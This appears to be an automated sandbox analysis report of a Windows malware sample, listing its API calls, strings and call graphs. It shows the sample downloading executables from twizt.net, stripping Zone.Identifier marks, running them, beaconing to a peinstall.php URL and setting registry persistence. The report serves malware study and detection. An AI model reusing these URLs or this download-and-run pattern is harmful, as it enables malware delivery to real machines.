                                                                    execution_graph 286 9c15cf 287 9c15ea 286->287 288 9c15e3 _exit 286->288 289 9c15f3 _cexit 287->289 290 9c15f9 __onexit 287->290 288->287 289->290 291 9c1b48 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 292 9c1c3a GetCurrentProcess TerminateProcess 291->292 293 9c1c32 _crt_debugger_hook 291->293 293->292 268 9c15bb _XcptFilter 269 9c13fb 274 9c1807 269->274 272 9c1438 _amsg_exit 273 9c1440 272->273 277 9c1762 274->277 276 9c1400 __getmainargs 276->272 276->273 284 9c19cc 277->284 279 9c176e _decode_pointer 280 9c1785 _onexit 279->280 281 9c1791 7 API calls 279->281 283 9c17f5 __onexit 280->283 285 9c17fe _unlock 281->285 283->276 284->279 285->283 294 9c170b 295 9c1747 294->295 297 9c171d 294->297 296 9c1742 ?terminate@ 296->295 297->295 297->296 298 9c1a25 _except_handler4_common 299 9c1620 300 9c162e __set_app_type _encode_pointer __p__fmode __p__commode 299->300 302 9c16cd _pre_c_init __RTC_Initialize 300->302 303 9c16db __setusermatherr 302->303 304 9c16e7 302->304 303->304 309 9c1a4a _controlfp_s 304->309 307 9c16fe 308 9c16f5 _configthreadlocale 308->307 310 9c1a66 _invoke_watson 309->310 311 9c16ec 309->311 310->311 311->307 311->308 209 9c1441 229 9c19cc 209->229 211 9c144d GetStartupInfoA 212 9c147b 211->212 213 9c148d 212->213 214 9c1494 Sleep 212->214 215 9c14ad _amsg_exit 213->215 216 9c14b7 213->216 214->212 217 9c14e0 215->217 216->217 218 9c14c0 _initterm_e 216->218 219 9c14ef _initterm 217->219 220 9c150a 217->220 218->217 222 9c14db __onexit 218->222 219->220 221 9c150e InterlockedExchange 220->221 225 9c1516 __IsNonwritableInCurrentImage 220->225 221->225 223 9c15a5 _ismbblead 223->225 224 9c15ea 224->222 226 9c15f3 _cexit 224->226 225->223 225->224 228 9c158f exit 225->228 230 9c1380 Sleep 225->230 226->222 228->225 229->211 239 9c1120 7 API calls 230->239 234 9c139d 235 9c13de 234->235 236 9c13a1 InternetOpenA 234->236 235->225 237 
9c13d9 InternetCloseHandle 236->237 238 9c13c2 InternetOpenUrlA InternetCloseHandle 236->238 237->235 238->237 240 9c12b9 InternetCloseHandle Sleep 239->240 241 9c11bb InternetOpenUrlW 239->241 242 9c12d8 6 API calls 240->242 243 9c1375 240->243 244 9c11dd CreateFileW 241->244 245 9c12b1 InternetCloseHandle 241->245 242->243 248 9c1343 wsprintfW DeleteFileW 242->248 258 9c1000 ExpandEnvironmentStringsW wsprintfW 243->258 246 9c12a4 CloseHandle 244->246 247 9c1202 InternetReadFile 244->247 245->240 246->245 249 9c125f CloseHandle wsprintfW DeleteFileW 247->249 250 9c1221 247->250 251 9c1080 4 API calls 248->251 264 9c1080 memset CreateProcessW 249->264 254 9c122f WriteFile InternetReadFile 250->254 255 9c125b 250->255 253 9c1372 251->253 253->243 254->250 254->255 255->249 256 9c1299 256->246 257 9c12a0 256->257 257->246 259 9c1043 258->259 260 9c1047 259->260 261 9c1050 CreateFileW 259->261 260->234 262 9c106f CloseHandle 261->262 263 9c1076 261->263 262->263 263->234 265 9c10e9 Sleep 264->265 266 9c10fb ShellExecuteW 264->266 265->256 266->265 267 9c1114 266->267 267->256 312 9c1701 315 9c1a78 312->315 314 9c1706 314->314 316 9c1a9d 315->316 317 9c1aaa GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 315->317 316->317 318 9c1aa1 316->318 317->318 318->314

                                                                    Callgraph

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 009C1129
                                                                    • srand.MSVCR90 ref: 009C1130
                                                                    • ExpandEnvironmentStringsW.KERNEL32 ref: 009C114F
                                                                    • rand.MSVCR90 ref: 009C1155
                                                                    • rand.MSVCR90 ref: 009C1169
                                                                    • wsprintfW.USER32 ref: 009C1195
                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009C11A7
                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009C11CD
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 009C11F1
                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 009C121B
                                                                    • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 009C1240
                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 009C1255
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 009C1260
                                                                    • wsprintfW.USER32 ref: 009C1278
                                                                    • DeleteFileW.KERNELBASE(?,?,?,?,?,?,%temp%,?,00000104), ref: 009C1289
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 009C12A5
                                                                    • InternetCloseHandle.WININET(00000000), ref: 009C12B2
                                                                    • InternetCloseHandle.WININET(00000000), ref: 009C12BA
                                                                    • Sleep.KERNELBASE(000003E8,?,?,%temp%,?,00000104), ref: 009C12CB
                                                                    • rand.MSVCR90 ref: 009C12D8
                                                                    • Sleep.KERNEL32 ref: 009C12E6
                                                                    • rand.MSVCR90 ref: 009C12E8
                                                                    • rand.MSVCR90 ref: 009C12FC
                                                                    • wsprintfW.USER32 ref: 009C1322
                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 009C133A
                                                                    • wsprintfW.USER32 ref: 009C1355
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,%temp%,?,00000104), ref: 009C1362
                                                                    Strings
                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 009C11A2
                                                                    • %s:Zone.Identifier, xrefs: 009C1272
                                                                    • %s\%d%d.exe, xrefs: 009C118F
                                                                    • %temp%, xrefs: 009C1145
                                                                    • %s\%d%d.exe, xrefs: 009C131C
                                                                    • %s:Zone.Identifier, xrefs: 009C134F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1477258605.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1477229625.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1477318610.00000000009C2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1477337602.00000000009C4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_9c0000_LM94OE0VNK.jbxd
                                                                    Similarity
                                                                    • API ID: File$Internet$rand$CloseHandlewsprintf$DeleteOpenReadSleep$CountCreateDownloadEnvironmentExpandStringsTickWritesrand
                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                    • API String ID: 1566391613-1161929716
                                                                    • Opcode ID: 7b3b870e566ca4cb9bec787b02525999ea8132a09655bcbf49118f5a44b1a7df
                                                                    • Instruction ID: f36a87550353c0d538836ec31d629ac1756d751733ce0d3a55cb49ca529c58a0
                                                                    • Opcode Fuzzy Hash: 7b3b870e566ca4cb9bec787b02525999ea8132a09655bcbf49118f5a44b1a7df
                                                                    • Instruction Fuzzy Hash: 5651B571E48341ABE321E760DC86FAB33ADABC5704F00491EF645961C2EA78A604D777

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009C1018
                                                                    • wsprintfW.USER32 ref: 009C1030
                                                                    • PathFileExistsW.KERNELBASE(00000000), ref: 009C103D
                                                                    • CreateFileW.KERNELBASE(40000000,40000000,00000000,00000000,00000001,00000002,00000000), ref: 009C1064
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 009C1070
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1477258605.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1477229625.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1477318610.00000000009C2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1477337602.00000000009C4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_9c0000_LM94OE0VNK.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                    • String ID: %s\33573537.jpg$%temp%$^[w
                                                                    • API String ID: 750032643-3416933354
                                                                    • Opcode ID: bcb7fe91dd7029c8dfd00d6daf8464ad10a9cc15cdb355e21ee9b7be2537b355
                                                                    • Instruction ID: cc4eb8a6b9118c164adaa3a52a47e0080d1eb699ebbf1cdb1d7249189176658b
                                                                    • Opcode Fuzzy Hash: bcb7fe91dd7029c8dfd00d6daf8464ad10a9cc15cdb355e21ee9b7be2537b355
                                                                    • Instruction Fuzzy Hash: FDF0F0F4D183006BE630DB20DC4AFDA3368AB44704F80491AB365D10E2EBB49188DBA6

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 009C1385
                                                                      • Part of subcall function 009C1120: GetTickCount.KERNEL32 ref: 009C1129
                                                                      • Part of subcall function 009C1120: srand.MSVCR90 ref: 009C1130
                                                                      • Part of subcall function 009C1120: ExpandEnvironmentStringsW.KERNEL32 ref: 009C114F
                                                                      • Part of subcall function 009C1120: rand.MSVCR90 ref: 009C1155
                                                                      • Part of subcall function 009C1120: rand.MSVCR90 ref: 009C1169
                                                                      • Part of subcall function 009C1120: wsprintfW.USER32 ref: 009C1195
                                                                      • Part of subcall function 009C1120: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009C11A7
                                                                      • Part of subcall function 009C1120: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009C11CD
                                                                      • Part of subcall function 009C1120: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 009C11F1
                                                                      • Part of subcall function 009C1120: InternetReadFile.WININET(00000000,?,00000103,?), ref: 009C121B
                                                                      • Part of subcall function 009C1120: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 009C1240
                                                                      • Part of subcall function 009C1120: InternetReadFile.WININET(00000000,?,00000103,?), ref: 009C1255
                                                                      • Part of subcall function 009C1000: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009C1018
                                                                      • Part of subcall function 009C1000: wsprintfW.USER32 ref: 009C1030
                                                                      • Part of subcall function 009C1000: PathFileExistsW.KERNELBASE(00000000), ref: 009C103D
                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009C13B0
                                                                    • InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 009C13D0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 009C13D7
                                                                    • InternetCloseHandle.WININET(00000000), ref: 009C13DA
                                                                    Strings
                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 009C13AB
                                                                    • http://twizt.net/newtpp.exe, xrefs: 009C138B
                                                                    • http://twizt.net/peinstall.php, xrefs: 009C13CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1477258605.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1477229625.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1477318610.00000000009C2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1477337602.00000000009C4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_9c0000_LM94OE0VNK.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$File$Open$CloseEnvironmentExpandHandleReadStringsrandwsprintf$CountCreateExistsPathSleepTickWritesrand
                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://twizt.net/newtpp.exe$http://twizt.net/peinstall.php
                                                                    • API String ID: 2331825455-3619598175
                                                                    • Opcode ID: 7e2cb2a5850fb0a219bc87ef1c135da7d12fecec33d78265d5402818ff1a1d43
                                                                    • Instruction ID: 49ae7997469457134309860d2c48afc7b60fa640ded9cb4765ed83937568e60c
                                                                    • Opcode Fuzzy Hash: 7e2cb2a5850fb0a219bc87ef1c135da7d12fecec33d78265d5402818ff1a1d43
                                                                    • Instruction Fuzzy Hash: 34F06535FD535176E23177612C0BF4A15185BC2F55F150019F701B91C29AD4A401E6BF

                                                                    Control-flow Graph

                                                                    control_flow_graph 35 9c1080-9c10e7 memset CreateProcessW 36 9c10e9-9c10fa Sleep 35->36 37 9c10fb-9c1112 ShellExecuteW 35->37 37->36 38 9c1114-9c111a 37->38
                                                                    APIs
                                                                    • memset.MSVCR90 ref: 009C108D
                                                                    • CreateProcessW.KERNELBASE ref: 009C10DE
                                                                    • Sleep.KERNELBASE(000003E8), ref: 009C10EE
                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 009C1109
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1477258605.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1477229625.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1477318610.00000000009C2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1477337602.00000000009C4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_9c0000_LM94OE0VNK.jbxd
                                                                    Similarity
                                                                    • API ID: CreateExecuteProcessShellSleepmemset
                                                                    • String ID: D$open
                                                                    • API String ID: 541629773-2491301029
                                                                    • Opcode ID: ec114391a3c48647faaea58aa493e31e4726f830c57a60dcd7ad3c774c7d27b8
                                                                    • Instruction ID: 797912bfa4c32fd2082de2a74e921a9840fb2ac7aa1fdfb5e6306ebe2e040809
                                                                    • Opcode Fuzzy Hash: ec114391a3c48647faaea58aa493e31e4726f830c57a60dcd7ad3c774c7d27b8
                                                                    • Instruction Fuzzy Hash: 04019671A843007AE320DF148C46F8B7BE4AF85B00F10481DF748AA1D1E7B09548CB9B

                                                                    Execution Graph

                                                                    Execution Coverage:0.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:16.7%
                                                                    Total number of Nodes:1437
                                                                    Total number of Limit Nodes:8
                                                                    execution_graph 5817 40cf00 5823 4021b0 5817->5823 5820 40cf3f 5821 40cf25 WaitForSingleObject 5827 401600 5821->5827 5824 4021cf 5823->5824 5825 4021bb 5823->5825 5824->5820 5824->5821 5825->5824 5848 402020 5825->5848 5828 40160d 5827->5828 5847 401737 5827->5847 5829 401619 EnterCriticalSection 5828->5829 5828->5847 5830 4016b5 LeaveCriticalSection SetEvent 5829->5830 5833 401630 5829->5833 5831 4016d0 5830->5831 5832 4016e8 5830->5832 5834 4016d6 PostQueuedCompletionStatus 5831->5834 5835 40d2d0 11 API calls 5832->5835 5833->5830 5836 401641 InterlockedDecrement 5833->5836 5838 40165a InterlockedExchangeAdd 5833->5838 5844 4016a0 InterlockedDecrement 5833->5844 5834->5832 5834->5834 5837 4016f3 5835->5837 5836->5833 5839 40d410 6 API calls 5837->5839 5838->5833 5840 40166d InterlockedIncrement 5838->5840 5841 4016fc CloseHandle CloseHandle WSACloseEvent 5839->5841 5842 401c50 4 API calls 5840->5842 5869 40ab40 shutdown closesocket 5841->5869 5842->5833 5844->5833 5845 401724 DeleteCriticalSection 5846 40a1b0 _invalid_parameter 3 API calls 5845->5846 5846->5847 5847->5820 5849 409d90 7 API calls 5848->5849 5850 40202b 5849->5850 5851 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5850->5851 5857 4021a5 5850->5857 5852 402076 CreateIoCompletionPort 5851->5852 5853 40219f 5851->5853 5852->5853 5854 40208f 5852->5854 5855 401600 35 API calls 5853->5855 5856 40d130 8 API calls 5854->5856 5855->5857 5858 402094 5856->5858 5857->5824 5858->5853 5859 40209f WSASocketA 5858->5859 5859->5853 5860 4020bd setsockopt htons bind 5859->5860 5860->5853 5861 402126 listen 5860->5861 5861->5853 5862 40213a WSACreateEvent 5861->5862 5862->5853 5863 402147 WSAEventSelect 5862->5863 5863->5853 5867 402159 5863->5867 5864 40217f 5866 40d160 16 API calls 5864->5866 5865 40d160 16 API calls 5865->5867 5868 402194 5866->5868 5867->5864 5867->5865 5868->5824 5869->5845 5344 406045 5346 405fbe 5344->5346 
5345 40604a LeaveCriticalSection 5346->5345 5347 40a220 8 API calls 5346->5347 5348 40601c 5347->5348 5348->5345 5349 407b49 5350 407b52 5349->5350 5351 407b61 34 API calls 5350->5351 5352 408996 5350->5352 5882 40a28e 5883 40a1b0 _invalid_parameter 3 API calls 5882->5883 5886 40a24d 5883->5886 5884 40a262 5885 409fa0 __aligned_recalloc_base 7 API calls 5885->5886 5886->5884 5886->5885 5887 40a264 memcpy 5886->5887 5887->5886 4355 407590 Sleep CreateMutexA GetLastError 4356 4075c6 ExitProcess 4355->4356 4357 4075ce 6 API calls 4355->4357 4358 407673 4357->4358 4359 40795a Sleep 4357->4359 4411 40e730 GetLocaleInfoA strcmp 4358->4411 4419 40c7d0 4359->4419 4364 407ae1 4365 407975 9 API calls 4422 405bc0 InitializeCriticalSection CreateFileW 4365->4422 5237 407440 4365->5237 5244 405880 4365->5244 5253 406bc0 Sleep GetModuleFileNameW 4365->5253 4366 407680 ExitProcess 4367 407688 ExpandEnvironmentStringsW wsprintfW CopyFileW 4369 407779 Sleep wsprintfW CopyFileW 4367->4369 4370 4076dc SetFileAttributesW RegOpenKeyExW 4367->4370 4371 4077c1 SetFileAttributesW RegOpenKeyExW 4369->4371 4372 40785e Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4369->4372 4370->4369 4374 407718 wcslen RegSetValueExW 4370->4374 4371->4372 4375 4077fd wcslen RegSetValueExW 4371->4375 4372->4359 4377 4078bd SetFileAttributesW RegOpenKeyExW 4372->4377 4374->4369 4378 40774d RegCloseKey 4374->4378 4375->4372 4379 407832 RegCloseKey 4375->4379 4377->4359 4381 4078f9 wcslen RegSetValueExW 4377->4381 4413 40e980 memset memset CreateProcessW 4378->4413 4383 40e980 6 API calls 4379->4383 4381->4359 4385 40792e RegCloseKey 4381->4385 4387 40784b 4383->4387 4389 40e980 6 API calls 4385->4389 4387->4372 4391 407856 ExitProcess 4387->4391 4388 407a2a CreateEventA 4452 40bf00 4388->4452 4393 407947 4389->4393 4390 407771 ExitProcess 4393->4359 4395 407952 ExitProcess 4393->4395 4402 40d160 16 API calls 4403 407a8a 4402->4403 4404 40d160 16 API calls 4403->4404 4405 407aa6 4404->4405 4406 40d160 16 
API calls 4405->4406 4407 407ac2 4406->4407 4495 40d2d0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4407->4495 4409 407ad2 4504 40d410 4409->4504 4412 407678 4411->4412 4412->4366 4412->4367 4414 40e9f1 ShellExecuteW 4413->4414 4415 40e9e2 Sleep 4413->4415 4417 40ea26 4414->4417 4418 40ea17 Sleep 4414->4418 4416 407766 4415->4416 4416->4369 4416->4390 4417->4416 4418->4416 4512 40c7a0 4419->4512 4423 405cd1 4422->4423 4424 405bf8 CreateFileMappingW 4422->4424 4434 40d640 CoInitializeEx 4423->4434 4424->4423 4425 405c19 MapViewOfFile 4424->4425 4425->4423 4426 405c38 GetFileSize 4425->4426 4430 405c4d 4426->4430 4427 405cc7 UnmapViewOfFile 4427->4423 4428 405c5c 4428->4427 4430->4427 4430->4428 4431 405c8c 4430->4431 4641 40c820 4430->4641 4648 405cf0 4430->4648 4432 40a1b0 _invalid_parameter 3 API calls 4431->4432 4432->4428 4952 40d710 socket 4434->4952 4436 407a25 4447 406fe0 CoInitializeEx SysAllocString 4436->4447 4437 40d660 4437->4436 4440 40d6aa 4437->4440 4446 40d6e8 4437->4446 4962 40d980 4437->4962 4977 40aa80 htons 4440->4977 4445 40e470 24 API calls 4445->4446 4996 40a2d0 4446->4996 4448 407002 4447->4448 4449 407018 CoUninitialize 4447->4449 5141 407030 4448->5141 4449->4388 5150 40bec0 4452->5150 4455 40bec0 3 API calls 4456 40bf1e 4455->4456 4457 40bec0 3 API calls 4456->4457 4458 40bf2e 4457->4458 4459 40bec0 3 API calls 4458->4459 4460 407a42 4459->4460 4461 40d130 4460->4461 4462 409d90 7 API calls 4461->4462 4463 40d13b 4462->4463 4464 407a4c 4463->4464 4465 40d147 InitializeCriticalSection 4463->4465 4466 40b2c0 InitializeCriticalSection 4464->4466 4465->4464 4471 40b2da 4466->4471 4467 40b309 CreateFileW 4469 40b330 CreateFileMappingW 4467->4469 4470 40b3de 4467->4470 4469->4470 4472 40b351 MapViewOfFile 4469->4472 5206 40ab60 EnterCriticalSection 4470->5206 4471->4467 5157 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4471->5157 5158 40aea0 4471->5158 4472->4470 4475 40b36c GetFileSize 4472->4475 4481 40b38b 
4475->4481 4476 40b3f7 4477 40d160 16 API calls 4476->4477 4479 407a56 4477->4479 4478 40b3d4 UnmapViewOfFile 4478->4470 4483 40d160 4479->4483 4481->4478 4482 40aea0 31 API calls 4481->4482 5205 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4481->5205 4482->4481 4484 40d177 EnterCriticalSection 4483->4484 4485 407a6f 4483->4485 5233 40d250 4484->5233 4485->4402 4488 40d23b LeaveCriticalSection 4488->4485 4489 409fe0 9 API calls 4490 40d1b9 4489->4490 4490->4488 4491 40d1cb CreateThread 4490->4491 4491->4488 4492 40d1ee 4491->4492 4493 40d212 GetCurrentProcess GetCurrentProcess DuplicateHandle 4492->4493 4494 40d234 4492->4494 4493->4494 4494->4488 4496 40d306 InterlockedExchangeAdd 4495->4496 4497 40d3e9 GetCurrentThread SetThreadPriority 4495->4497 4496->4497 4502 40d320 4496->4502 4497->4409 4498 40d339 EnterCriticalSection 4498->4502 4499 40d3a7 LeaveCriticalSection 4499->4502 4503 40d3be 4499->4503 4500 40d383 WaitForSingleObject 4500->4502 4501 40d3dc Sleep 4501->4502 4502->4497 4502->4498 4502->4499 4502->4500 4502->4501 4502->4503 4503->4497 4505 40d492 4504->4505 4506 40d41c EnterCriticalSection 4504->4506 4505->4364 4507 40d438 LeaveCriticalSection DeleteCriticalSection 4506->4507 4509 40a1b0 _invalid_parameter 3 API calls 4507->4509 4510 40d486 4509->4510 4511 40a1b0 _invalid_parameter 3 API calls 4510->4511 4511->4505 4515 40c3f0 4512->4515 4516 40c40e 4515->4516 4519 40c423 4515->4519 4521 40c450 4516->4521 4518 40796a 4518->4364 4518->4365 4519->4518 4547 40c5d0 4519->4547 4522 40c479 4521->4522 4523 40c502 4521->4523 4546 40c4fa 4522->4546 4581 409d90 4522->4581 4525 409d90 7 API calls 4523->4525 4523->4546 4527 40c528 4525->4527 4529 402420 7 API calls 4527->4529 4527->4546 4531 40c555 4529->4531 4533 4024e0 10 API calls 4531->4533 4535 40c56f 4533->4535 4534 40c4cf 4536 402420 7 API calls 4534->4536 4538 402420 7 API calls 4535->4538 4537 40c4e0 4536->4537 4539 4024e0 10 API calls 4537->4539 4540 40c580 4538->4540 4539->4546 4541 4024e0 10 API 
calls 4540->4541 4542 40c59a 4541->4542 4543 402420 7 API calls 4542->4543 4544 40c5ab 4543->4544 4545 4024e0 10 API calls 4544->4545 4545->4546 4546->4518 4548 40c5f9 4547->4548 4549 40c6aa 4547->4549 4550 40c6a2 4548->4550 4551 409d90 7 API calls 4548->4551 4549->4550 4553 409d90 7 API calls 4549->4553 4550->4518 4552 40c60f 4551->4552 4552->4550 4555 402420 7 API calls 4552->4555 4554 40c6ce 4553->4554 4554->4550 4557 402420 7 API calls 4554->4557 4556 40c633 4555->4556 4558 409d90 7 API calls 4556->4558 4559 40c6f2 4557->4559 4560 40c642 4558->4560 4561 409d90 7 API calls 4559->4561 4562 4024e0 10 API calls 4560->4562 4563 40c701 4561->4563 4564 40c66b 4562->4564 4565 4024e0 10 API calls 4563->4565 4566 40a1b0 _invalid_parameter 3 API calls 4564->4566 4567 40c72a 4565->4567 4568 40c677 4566->4568 4569 40a1b0 _invalid_parameter 3 API calls 4567->4569 4570 402420 7 API calls 4568->4570 4571 40c736 4569->4571 4573 40c688 4570->4573 4572 402420 7 API calls 4571->4572 4574 40c747 4572->4574 4575 4024e0 10 API calls 4573->4575 4576 4024e0 10 API calls 4574->4576 4575->4550 4577 40c761 4576->4577 4578 402420 7 API calls 4577->4578 4579 40c772 4578->4579 4580 4024e0 10 API calls 4579->4580 4580->4550 4592 409db0 4581->4592 4584 402420 4613 409fa0 4584->4613 4589 4024e0 4620 402540 4589->4620 4591 4024ff __aligned_recalloc_base 4591->4534 4601 409e50 GetCurrentProcessId 4592->4601 4594 409dbb 4595 409dc7 __aligned_recalloc_base 4594->4595 4602 409e70 4594->4602 4596 409d9e 4595->4596 4598 409de2 HeapAlloc 4595->4598 4596->4546 4596->4584 4598->4596 4599 409e09 __aligned_recalloc_base 4598->4599 4599->4596 4600 409e24 memset 4599->4600 4600->4596 4601->4594 4610 409e50 GetCurrentProcessId 4602->4610 4604 409e79 4605 409e96 HeapCreate 4604->4605 4611 409ee0 GetProcessHeaps 4604->4611 4606 409eb0 HeapSetInformation GetCurrentProcessId 4605->4606 4607 409ed7 4605->4607 4606->4607 4607->4595 4610->4604 4612 409e8c 4611->4612 4612->4605 4612->4607 4614 409db0 
__aligned_recalloc_base 7 API calls 4613->4614 4615 40242b 4614->4615 4616 402820 4615->4616 4617 40282a 4616->4617 4618 409fa0 __aligned_recalloc_base 7 API calls 4617->4618 4619 402438 4618->4619 4619->4589 4621 40258e 4620->4621 4623 402551 4620->4623 4622 409fa0 __aligned_recalloc_base 7 API calls 4621->4622 4621->4623 4626 4025b2 _invalid_parameter 4622->4626 4623->4591 4624 4025e2 memcpy 4625 402606 _invalid_parameter 4624->4625 4628 40a1b0 _invalid_parameter 3 API calls 4625->4628 4626->4624 4630 40a1b0 4626->4630 4628->4623 4637 409e50 GetCurrentProcessId 4630->4637 4632 40a1bb 4633 4025df 4632->4633 4638 40a0f0 4632->4638 4633->4624 4636 40a1d7 HeapFree 4636->4633 4637->4632 4639 40a120 HeapValidate 4638->4639 4640 40a140 4638->4640 4639->4640 4640->4633 4640->4636 4658 40a220 4641->4658 4644 40c861 4644->4430 4647 40a1b0 _invalid_parameter 3 API calls 4647->4644 4871 409fe0 4648->4871 4651 405d2a memcpy 4652 40a220 8 API calls 4651->4652 4653 405d61 4652->4653 4881 40c190 4653->4881 4656 405de8 4656->4430 4659 40a24d 4658->4659 4660 409fa0 __aligned_recalloc_base 7 API calls 4659->4660 4661 40a262 4659->4661 4662 40a264 memcpy 4659->4662 4660->4659 4661->4644 4663 40bd30 4661->4663 4662->4659 4666 40bd3a 4663->4666 4667 40bd71 memcmp 4666->4667 4668 40bd98 4666->4668 4670 40a1b0 _invalid_parameter 3 API calls 4666->4670 4671 40bd59 4666->4671 4672 40c220 4666->4672 4686 407af0 4666->4686 4667->4666 4669 40a1b0 _invalid_parameter 3 API calls 4668->4669 4669->4671 4670->4666 4671->4644 4671->4647 4673 40c22f __aligned_recalloc_base 4672->4673 4674 409fa0 __aligned_recalloc_base 7 API calls 4673->4674 4676 40c239 4673->4676 4675 40c2c8 4674->4675 4675->4676 4677 402420 7 API calls 4675->4677 4676->4666 4678 40c2dd 4677->4678 4679 402420 7 API calls 4678->4679 4680 40c2e5 4679->4680 4682 40c33d __aligned_recalloc_base 4680->4682 4689 40c390 4680->4689 4694 402470 4682->4694 4685 402470 3 API calls 4685->4676 4802 409d10 4686->4802 4690 4024e0 10 API calls 
